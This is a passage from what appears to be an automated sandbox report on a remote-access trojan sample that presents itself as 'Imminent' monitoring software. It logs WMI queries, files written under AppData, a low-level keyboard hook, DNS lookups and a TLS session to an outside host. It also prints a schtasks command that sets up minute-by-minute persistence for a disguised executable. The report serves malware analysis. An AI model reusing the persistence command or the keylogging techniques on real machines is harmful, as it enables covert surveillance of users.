| Create | WbemDefaultPathParser | IWbemPath | cls_context = CLSCTX_INPROC_SERVER |
|
3 | |
| Create | 62BE5D10-60EB-11D0-BD3B-00A0C911CE86 | 00000001-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\SecurityCenter2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 |
File (160)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\network.dat | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\system.dat | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
3 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create Directory | C:\Users\JPenUM\AppData\Roaming\Imminent | - |
|
1 | |
| Create Directory | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs | - |
|
1 | |
| Create Directory | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring | - |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM | type = file_attributes |
|
2 | |
| Get Info | C:\Users | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\network.dat | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\system.dat | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\network.dat | type = file_type |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\system.dat | type = file_type |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_type |
|
4 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_attributes |
|
9 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | type = file_type |
|
4 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_type |
|
10 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_type |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_type |
|
8 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_type |
|
4 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = file_type |
|
8 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | type = size, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | size = 4096, size_out = 181 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 5 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | size = 4096, size_out = 33 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 266 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 614 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 962 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 1310 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 1658 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 2006 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 2354 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 4096, size_out = 2702 |
|
1 | |
| Write | - | size = 5 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\network.dat | size = 27 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\system.dat | size = 18 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 266 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | size = 33 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 614 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 962 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 1310 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 1658 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 2006 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 2354 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 2702 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | size = 3050 |
|
1 | |
| Delete | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier | - |
|
1 |
Registry (27)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Impersonation Level, data = 3 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace, data = 114 |
|
1 |
Module (61)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll | base_address = 0x6a310000 |
|
1 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x76f70000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
4 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x75d30000 |
|
1 | |
| Get Handle | 0 | base_address = 0x0 |
|
1 | |
| Get Address | Unknown module name | function = ResetSecurity, address_out = 0x6a311944 |
|
1 | |
| Get Address | Unknown module name | function = SetSecurity, address_out = 0x6a311986 |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServices, address_out = 0x6a3119cc |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServicesObject, address_out = 0x6a311a1e |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyHandle, address_out = 0x6a311a70 |
|
1 | |
| Get Address | Unknown module name | function = WritePropertyValue, address_out = 0x6a311a89 |
|
1 | |
| Get Address | Unknown module name | function = Clone, address_out = 0x6a311aa2 |
|
2 | |
| Get Address | Unknown module name | function = VerifyClientKey, address_out = 0x6a312270 |
|
1 | |
| Get Address | Unknown module name | function = GetQualifierSet, address_out = 0x6a311d73 |
|
1 | |
| Get Address | Unknown module name | function = Get, address_out = 0x6a311b96 |
|
1 | |
| Get Address | Unknown module name | function = Put, address_out = 0x6a311b7a |
|
1 | |
| Get Address | Unknown module name | function = Delete, address_out = 0x6a311bb5 |
|
1 | |
| Get Address | Unknown module name | function = GetNames, address_out = 0x6a311bc8 |
|
1 | |
| Get Address | Unknown module name | function = BeginEnumeration, address_out = 0x6a311be4 |
|
1 | |
| Get Address | Unknown module name | function = Next, address_out = 0x6a311bf7 |
|
1 | |
| Get Address | Unknown module name | function = EndEnumeration, address_out = 0x6a311c16 |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyQualifierSet, address_out = 0x6a311c26 |
|
1 | |
| Get Address | Unknown module name | function = GetObjectText, address_out = 0x6a311c3c |
|
1 | |
| Get Address | Unknown module name | function = SpawnDerivedClass, address_out = 0x6a311c52 |
|
1 | |
| Get Address | Unknown module name | function = SpawnInstance, address_out = 0x6a311c68 |
|
1 | |
| Get Address | Unknown module name | function = CompareTo, address_out = 0x6a311c7e |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyOrigin, address_out = 0x6a311c94 |
|
1 | |
| Get Address | Unknown module name | function = InheritsFrom, address_out = 0x6a311caa |
|
1 | |
| Get Address | Unknown module name | function = GetMethod, address_out = 0x6a311cbd |
|
1 | |
| Get Address | Unknown module name | function = PutMethod, address_out = 0x6a311cd9 |
|
1 | |
| Get Address | Unknown module name | function = DeleteMethod, address_out = 0x6a311cf5 |
|
1 | |
| Get Address | Unknown module name | function = BeginMethodEnumeration, address_out = 0x6a311d08 |
|
1 | |
| Get Address | Unknown module name | function = NextMethod, address_out = 0x6a311d1b |
|
1 | |
| Get Address | Unknown module name | function = EndMethodEnumeration, address_out = 0x6a311d37 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodQualifierSet, address_out = 0x6a311d47 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodOrigin, address_out = 0x6a311d5d |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Get, address_out = 0x6a311d86 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Put, address_out = 0x6a311da2 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Delete, address_out = 0x6a311dbb |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_GetNames, address_out = 0x6a311dce |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Next, address_out = 0x6a311df7 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 |
|
1 | |
| Get Address | Unknown module name | function = GetCurrentApartmentType, address_out = 0x6a311d73 |
|
1 | |
| Get Address | Unknown module name | function = GetDemultiplexedStub, address_out = 0x6a3118fd |
|
1 | |
| Get Address | Unknown module name | function = CreateInstanceEnumWmi, address_out = 0x6a311580 |
|
1 | |
| Get Address | Unknown module name | function = CreateClassEnumWmi, address_out = 0x6a3115f6 |
|
1 | |
| Get Address | Unknown module name | function = ExecQueryWmi, address_out = 0x6a31169e |
|
1 | |
| Get Address | Unknown module name | function = ExecNotificationQueryWmi, address_out = 0x6a311717 |
|
1 | |
| Get Address | Unknown module name | function = PutInstanceWmi, address_out = 0x6a311790 |
|
1 | |
| Get Address | Unknown module name | function = PutClassWmi, address_out = 0x6a311810 |
|
1 | |
| Get Address | Unknown module name | function = CloneEnumWbemClassObject, address_out = 0x6a311890 |
|
1 | |
| Get Address | Unknown module name | function = ConnectServerWmi, address_out = 0x6a3124b7 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = DuplicateTokenEx, address_out = 0x76f7ca24 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = DefWindowProcW, address_out = 0x75d4507d |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
Window (3)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | .NET-BroadcastEventWindow.2.0.0.0.33c0d9d.0 | class_name = .NET-BroadcastEventWindow.2.0.0.0.33c0d9d.0, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 1976848509 |
|
1 |
System (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Get Computer Name | result_out = ARRARNMKU |
|
1 | |
| Register Hook | type = WH_KEYBOARD_LL, hookproc_address = 0xd18ea |
|
1 | |
| Get Info | type = Operating System |
|
7 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = a403e9b3-6f76-41ac-ab55-e693040d1b8b |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = a403e9b3-6f76-41ac-ab55-e693040d1b8b |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = COR_PROFILER |
|
1 | |
| Get Environment String | name = COR_ENABLE_PROFILING |
|
1 |
Network Behavior
DNS (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = ArRARNMKU |
|
1 | |
| Resolve Name | host = ArRARNMKU, address_out = 192.168.0.219 |
|
1 | |
| Resolve Name | host = linkadrum.nl, address_out = 147.135.136.193 |
|
1 | |
| Resolve Name | host = www.iptrackeronline.com, address_out = 45.55.57.244 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 490 bytes |
| Total Data Received | 20.52 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 45.55.57.244:443 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x6bc |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 45.55.57.244 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 49162 |
| Data Sent | 490 bytes |
| Data Received | 20.52 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 45.55.57.244, remote_port = 443 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 127, size_out = 127 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 93, size_out = 93 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2615, size_out = 2615 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 331, size_out = 331 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4, size_out = 4 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 134, size_out = 134 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 229, size_out = 229 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 480, size_out = 480 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 32, size_out = 32 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4336, size_out = 4336 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4192, size_out = 4192 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 32, size_out = 32 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 32, size_out = 32 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4160, size_out = 4160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4464, size_out = 2899 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1565, size_out = 1565 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 32, size_out = 32 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 32, size_out = 32 |
|
1 |
Process #14: schtasks.exe
20
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\schtasks.exe |
| Command Line | "C:\Windows\System32\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe" /sc minute /mo 1 /F |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:33, Reason: Child Process |
| Unmonitor | End Time: 00:01:36, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa18 |
| Parent PID | 0x30c (c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A10
0x
A34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
